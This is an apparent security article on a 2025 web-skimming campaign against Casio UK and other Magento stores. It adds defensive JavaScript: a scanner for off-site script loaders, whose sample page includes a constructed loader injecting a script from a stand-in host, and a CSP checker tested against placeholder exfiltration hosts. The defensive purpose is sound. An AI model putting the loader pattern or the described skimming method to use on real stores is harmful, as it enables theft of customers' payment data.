Casio UK invaded by the Magento Web Skimmer Campaign

Background

Web skimming, also known as “Magecart attacks,” involves injecting malicious code into e-commerce websites to steal payment card information and other sensitive data entered by customers. These attacks typically exploit vulnerabilities in the website’s software or third-party plugins to insert skimming scripts. Once the malicious script is in place, it captures the data entered by customers during the checkout process and transmits it to the attackers’ servers.

Overview of the Campaign

  • Affected E-Commerce Sites: The campaign targeted multiple e-commerce websites, including the well-known brand Casio UK. The casio.co.uk website was compromised between January 14 and January 24, 2025. At least 17 other e-commerce websites were also targeted by the same campaign.
  • Discovery: The campaign was discovered by Jscrambler, a security vendor specializing in client-side security. They notified Casio on January 28, 2025, about the breach.
  • Response: Casio acted swiftly and removed the malicious code within 24 hours of being notified.

Attack Methodology

  • Initial Infection: Attackers exploited vulnerabilities in the Magento e-commerce software used by the affected sites. This gave them write access to page content, which they used to insert a small first-stage skimmer loader directly into the websites’ homepages.
  • Second-Stage Skimmer: The loader did little on its own; its job was to fetch a more advanced, second-stage skimmer from a server hosted in Russia. That second stage carried the actual logic for capturing and exfiltrating sensitive data, so the code visible in the compromised page itself gave few clues about what the attack did.
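The two-stage structure above is what a page-level scan can catch: a script tag pulled from a host the store does not own, or an inline snippet that creates a script element pointing at an off-site URL. The following is an added example written for this page, not code from Jscrambler, Casio or any Magento component. The HTML sample, the store origin `shop.example` and the `.invalid` hostnames are constructed placeholders; the allowlist is an assumption about which hosts a given store actually trusts.

```javascript
// Static scanner for loader patterns in served HTML (added example; hostnames constructed).
const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR = /\bsrc\s*=\s*["']([^"']+)["']/i;
// A URL literal inside inline code: absolute http(s) or protocol-relative.
const URL_LITERAL = /["'`]((?:https?:)?\/\/[^"'`\s]+)["'`]/g;

// Constructed stand-in for the store's own origin, used to resolve relative src values.
const STORE_ORIGIN = 'https://shop.example';

function hostOf(url) {
  try {
    return new URL(url, STORE_ORIGIN).hostname;
  } catch {
    return null; // not a URL we can reason about; ignore
  }
}

// Returns one finding per script that is loaded from, or inline code that
// references, a host outside the allowlist. allowedHosts should contain the
// store's own domains plus vetted third parties (PSP, tag manager, CDN).
function scanHtmlForLoaders(html, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  for (const m of html.matchAll(SCRIPT_TAG)) {
    const attrs = m[1];
    const body = m[2];
    const src = attrs.match(SRC_ATTR);
    if (src) {
      const host = hostOf(src[1]);
      if (host && !allowed.has(host)) {
        findings.push({ kind: 'external-script', host, url: src[1] });
      }
      continue;
    }
    // Inline script: a dynamically created <script> plus an off-site URL is the
    // classic first-stage loader shape; an off-site URL alone is still worth a look.
    const createsScript = /createElement\s*\(\s*["']script["']\s*\)/i.test(body);
    for (const u of body.matchAll(URL_LITERAL)) {
      const host = hostOf(u[1]);
      if (host && !allowed.has(host)) {
        findings.push({ kind: createsScript ? 'inline-loader' : 'inline-offsite-url', host, url: u[1] });
      }
    }
  }
  return findings;
}

// Constructed sample page: two legitimate scripts and one injected loader.
const SAMPLE_PAGE = `
<html><head>
<script src="/static/js/app.js"></script>
<script src="https://cdn.shop.example/vendor.js"></script>
<script>
  // constructed stand-in for a first-stage loader
  var s = document.createElement('script');
  s.src = 'https://stage2.invalid/loader.js';
  document.head.appendChild(s);
</script>
</head><body>cart page</body></html>`;

const ALLOWED_HOSTS = ['shop.example', 'cdn.shop.example'];

console.log(scanHtmlForLoaders(SAMPLE_PAGE, ALLOWED_HOSTS));
```

Run it against a crawl of every page, not just the checkout: in this campaign the loader sat on the homepage and the fake form was shown from the cart page, so a check scoped to the payment page alone would have reported nothing.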

Execution of the Skimming Attack

  • Fake Checkout Form: Instead of modifying the legitimate checkout page, the malicious code displayed a fake payment form when users clicked the “checkout” button on the cart page. This fake form asked users to enter their personal and payment information. Because the genuine payment page was left untouched, integrity checks limited to that page would not have noticed anything.
  • Double-Entry Skimming: Users were deceived into filling out their details twice. First, they completed a fraudulent three-step form requesting email, name, address, and credit card details. After submitting it, they were redirected to the legitimate checkout page and had to re-enter the same details, so the order still went through and nothing looked broken from the customer’s side.
  • Data Exfiltration: The skimmer captured the data entered into the fake form and sent it to a server controlled by the attackers.

Technical Details

  • Obfuscation Techniques: The second-stage skimmer payload used basic obfuscation, including XOR-based string concealment, to hide strings such as field names, paths and endpoints from casual inspection and simple signature matching.
  • Data Encryption: Stolen data was encrypted with AES-256-CBC using a fresh key and initialization vector (IV) for each request. The point of this is not to protect the victim’s data but to make every exfiltration request look different on the wire, so that static patterns do not match and network inspection cannot read what is being sent. The page does not describe how the per-request key reaches the attackers’ server.

Security Recommendations

  • Content Security Policy (CSP): A well-maintained CSP can significantly reduce the risk of such attacks by controlling which scripts a page may execute and where it may send data. To be useful against this campaign the policy has to cover more than script-src: the skimmer also needs connect-src (or form-action, if the fake form posts directly) to reach the exfiltration server. A policy deployed in report-only mode records violations but blocks nothing, and an effective enforced policy requires continuous monitoring and updates as legitimate third-party scripts change.
  • Automated Monitoring Solutions: E-commerce platforms are advised to deploy automated script security software that watches what actually runs in the customer’s browser. Such solutions can detect and mitigate skimming infections in real time, safeguarding both the platform and its users.
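To make the CSP point concrete, here is an added example (not part of the original page, and not a substitute for a browser’s full CSP implementation) that evaluates a policy header against the loads this campaign needed: fetching the second stage, opening a connection to the exfiltration host, and submitting the fake form. It handles `'self'`, `'none'`, `*`, scheme sources and host sources with a leading `*.`; nonces, hashes, ports and path matching are left out as a simplification. The page origin, the two header strings and the `.invalid` hostnames are constructed.

```javascript
// Added example: evaluate CSP directives against the loads a skimmer needs.

// Parse a Content-Security-Policy header value into { directive: [sources] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Does one source expression match a URL, given the page's own origin?
// Simplified: ports and paths are ignored; nonce/hash sources never match a URL.
function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === pageOrigin;
  if (s.startsWith("'")) return false; // 'unsafe-inline', 'nonce-...', 'sha256-...'
  if (s === '*') return true;
  if (s === 'https:' || s === 'http:') return url.protocol === s;
  const m = s.match(/^(?:(https?):\/\/)?(\*\.)?([^\/:]+)/);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme && url.protocol !== scheme + ':') return false;
  return wildcard ? url.hostname.endsWith('.' + host) : url.hostname === host;
}

// Directives that browsers do NOT fall back to default-src for.
const NO_FALLBACK = new Set(['form-action', 'frame-ancestors', 'base-uri', 'sandbox', 'report-uri']);

// Would the policy let `urlString` through for `directive`? `reportOnly`
// models Content-Security-Policy-Report-Only: the violation is recorded but
// the load is still allowed, which is why report-only does not stop a skimmer.
function cspDecision(header, directive, urlString, pageOrigin, reportOnly = false) {
  const policy = parseCsp(header);
  const url = new URL(urlString);
  const fallback = NO_FALLBACK.has(directive) ? undefined : policy['default-src'];
  const sources = policy[directive] ?? fallback;
  if (sources === undefined) return { allowed: true, violation: false }; // nothing restricts it
  const ok = sources.some((src) => sourceMatches(src, url, pageOrigin));
  return { allowed: ok || reportOnly, violation: !ok };
}

// Constructed page origin and policies.
const PAGE_ORIGIN = 'https://shop.example';
const WEAK_POLICY = "default-src * 'unsafe-inline'";
const HARDENED_POLICY = [
  "default-src 'self'",
  "script-src 'self' https://cdn.shop.example",
  "connect-src 'self'",
  "form-action 'self'",
].join('; ');

// The three loads the campaign depends on, with constructed attacker hosts.
const STAGE2 = 'https://stage2.invalid/loader.js';
const EXFIL = 'https://exfil.invalid/collect';

console.log('weak policy, second stage:', cspDecision(WEAK_POLICY, 'script-src', STAGE2, PAGE_ORIGIN));
console.log('hardened, second stage:', cspDecision(HARDENED_POLICY, 'script-src', STAGE2, PAGE_ORIGIN));
console.log('hardened, exfil fetch:', cspDecision(HARDENED_POLICY, 'connect-src', EXFIL, PAGE_ORIGIN));
console.log('hardened, fake form post:', cspDecision(HARDENED_POLICY, 'form-action', EXFIL, PAGE_ORIGIN));
console.log('hardened but report-only:', cspDecision(HARDENED_POLICY, 'script-src', STAGE2, PAGE_ORIGIN, true));
```

Note the last call: the same hardened policy served as Content-Security-Policy-Report-Only still lets the second stage load. Report-only is a useful staging step while you discover which third-party hosts the site legitimately uses, but the protection only starts once the header is switched to enforcing.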

Importance of Strong Security Measures

This incident underscores the necessity of strong security measures for e-commerce platforms:

  • Regular Vulnerability Assessments: Continuous monitoring and timely assessments are crucial to identify and patch vulnerabilities in the platform and its extensions before they are exploited.
  • Proactive Mitigation Strategies: Proactive controls such as least-privilege access to the store’s administration backend, prompt patching of the e-commerce platform and its extensions, and integrity checks on the scripts the site serves can prevent unauthorized access and limit the damage a skimming attack can do.
  • User Education: Educating users about the risks and signs of skimming attacks can help them recognize and avoid fraudulent activity; in this campaign, being asked to enter card details twice was the visible sign that something was wrong.

By understanding the background and detailed execution of such attacks, e-commerce platforms can better prepare and protect themselves against future threats.
